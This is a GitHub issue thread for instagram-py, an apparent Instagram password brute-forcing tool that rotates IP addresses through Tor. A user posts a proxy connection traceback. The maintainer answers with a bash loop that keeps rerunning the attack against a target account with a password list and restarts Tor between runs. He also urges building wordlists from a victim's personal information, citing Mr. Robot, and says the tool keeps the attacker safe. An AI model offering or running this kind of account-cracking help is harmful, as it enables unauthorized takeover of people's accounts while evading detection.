### ISSUE TITLE
Script stops automatically

### ISSUE THREAD

**Issue by ahmetu66** [antony-jr/instagram-py#18]
**Select your issue type:** (check at least one)
- [x ] Bug
- [ ] Question
- [ ] Suggestion
- [ ] Other (please describe):

**Describe your issue:**

Script stops by itself all the time. I get this error: 

Traceback (most recent call last):
  File "/usr/local/lib/python3.5/dist-packages/socks.py", line 851, in connect
    negotiate(self, dest_addr, dest_port)
  File "/usr/local/lib/python3.5/dist-packages/socks.py", line 497, in _negotiate_SOCKS5
    self, CONNECT, dest_addr)
  File "/usr/local/lib/python3.5/dist-packages/socks.py", line 578, in _SOCKS5_request
    raise SOCKS5Error("{0:#04x}: {1}".format(status, error))
socks.SOCKS5Error: 0x05: Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.5/dist-packages/urllib3/contrib/socks.py", line 88, in _new_conn
    **extra_kw
  File "/usr/local/lib/python3.5/dist-packages/socks.py", line 262, in create_connection
    raise err
  File "/usr/local/lib/python3.5/dist-packages/socks.py", line 252, in create_connection
    sock.connect((remote_host, remote_port))
  File "/usr/local/lib/python3.5/dist-packages/socks.py", line 100, in wrapper
    return function(*args, **kwargs)
  File "/usr/local/lib/python3.5/dist-packages/socks.py", line 855, in connect
    raise GeneralProxyError("Socket error", error)
socks.GeneralProxyError: Socket error: 0x05: Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpool.py", line 601, in urlopen
    chunked=chunked)
  File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpool.py", line 357, in _make_request
    conn.request(method, url, **httplib_request_kw)
  File "/usr/lib/python3.5/http/client.py", line 1107, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib/python3.5/http/client.py", line 1152, in _send_request
    self.endheaders(body)
  File "/usr/lib/python3.5/http/client.py", line 1103, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python3.5/http/client.py", line 934, in _send_output
    self.send(msg)
  File "/usr/lib/python3.5/http/client.py", line 877, in send
    self.connect()
  File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py", line 166, in connect
    conn = self._new_conn()
  File "/usr/local/lib/python3.5/dist-packages/urllib3/contrib/socks.py", line 110, in _new_conn
    "Failed to establish a new connection: %s" % error
urllib3.exceptions.NewConnectionError: <urllib3.contrib.socks.SOCKSConnection object at 0x7617eeb0>: Failed to establish a new connection: 0x05: Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py", line 440, in send
    timeout=timeout
  File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpool.py", line 639, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py", line 388, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: SOCKSHTTPConnectionPool(host='httpbin.org', port=80): Max retries exceeded with url: /ip (Caused by NewConnectionError('<urllib3.contrib.socks.SOCKSConnection object at 0x7617eeb0>: Failed to establish a new connection: 0x05: Connection refused',))

During handling of the above exception, another exception occurred:
Traceback (most recent call last):
  File "/usr/local/bin/instagram-py", line 11, in <module>
    sys.exit(ExecuteInstagramPy())
  File "/usr/local/lib/python3.5/dist-packages/InstagramPy/__init__.py", line 133, in ExecuteInstagramPy
    instagrampy.TryPassword()
  File "/usr/local/lib/python3.5/dist-packages/InstagramPy/InstagramPyInstance.py", line 143, in TryPassword
    self.session.ChangeIPAddress()  # signal tor to change ip
  File "/usr/local/lib/python3.5/dist-packages/InstagramPy/InstagramPySession.py", line 294, in ChangeIPAddress
    'http://httpbin.org/ip').json())['origin']
  File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py", line 521, in get
    return self.request('GET', url, **kwargs)
  File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
in get
    return self.request('GET', url, **kwargs)
  File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
  File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py", line 508, in send
    raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: SOCKSHTTPConnectionPool(host='httpbin.org', port=80): Max retries exceeded with url: /ip (Caused by NewConnectionError('<urllib3.contrib.socks.SOCKSConnection object at 0x7617eeb0>: Failed to establish a new connection: 0x05: Connection refused',))

**Ways to Reproduce the issue (optional):**

**Comment by ahmetu66** [comment]
when I close the pc, but I also have other scripts running on the pi who don't stop working. If it was an network interruption, they would stop too?

**Comment by antony-jr** [comment]
when you close your pc , does it disconnect from the internet? ( a lot pc's do that )

**Comment by ahmetu66** [comment]
I am connected to my pi via vnc viewer on my pc. Pi is always on and connected to the internet so that shouldn't be the problem

**Comment by antony-jr** [comment]
I think this is caused by tor server , At some point it must have disconnected(from tor circuit) ? I will look into this..
For now just restart the tor server and continue your attack , a simple bash script can take care of that....
like this
```
#!/usr/bin/env bash
while [ 1 ]; do instagram-py -c -u target -pl passwords.lst;service restart tor;done
```

**Comment by antony-jr** [comment]
@ahmetu66 Also I have to reiterate something.... Brute force attacks are one of the basic attacks which is safe and efficient only if the right wordlist is used. If you watched Mr.Robot , Eliot always uses brute force attack for social media's , He first collects the victims information to create a wordlist and uses a brute force tool to execute it. The wordlist generation is the vital part and the brute force tool is also vital to keep you safe and try the passwords with no false positives ( Which is solid in Instagram-Py ).
